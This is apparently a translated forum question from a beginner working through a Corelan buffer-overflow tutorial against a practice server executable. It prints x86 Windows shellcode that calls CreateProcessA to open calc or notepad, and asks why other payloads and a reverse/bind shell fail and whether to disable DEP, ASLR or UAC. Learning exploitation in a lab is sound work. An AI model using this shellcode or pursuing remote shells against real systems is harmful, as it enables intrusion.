我已经挣扎了一个星期而无法解决这个问题。请帮忙。 我的朋友给了我一个可执行文件,它只是一个简单的服务器并且有缓冲区溢出漏洞我的目标是获得反向/绑定shell。 我遵循以下指示: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ 并且能够找到" jmp esp"并成功运行shellcode: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html 问题是我无法从metasploit / internet运行任何shellcode。 我尝试修改shellcode,能够弹出记事本,但无法运行如下命令:
下面是我的shellcode:
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd"
#"\x68\x63\x61\x6c\x63" #calc
#
"\x68\x70\x61\x64\x20\x68\x6E\x6F\x74\x65"#notepad
#"\x68\x6E\x66\x69\x67\x68\x6D\x73\x63\x6F"#msconfig
"\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7"
请给我一些提示,告诉我为什么我不能运行任何其他shellcode和命令。
环境:赢得7专业,安装Macfee,免疫调试器
我怀疑他在编译可执行文件时使用了一些保护机制。但既然我可以弹出计算和记事本,为什么我不能运行其他命令呢? 无论如何,我是缓冲区溢出和shellcode的新手,请帮忙。 ----------------------更新------------------------ 问一些人,他们说我应该试着关掉一些保护措施。我尝试禁用DEP,但仍无效。我应该禁用ASLR和UAC吗?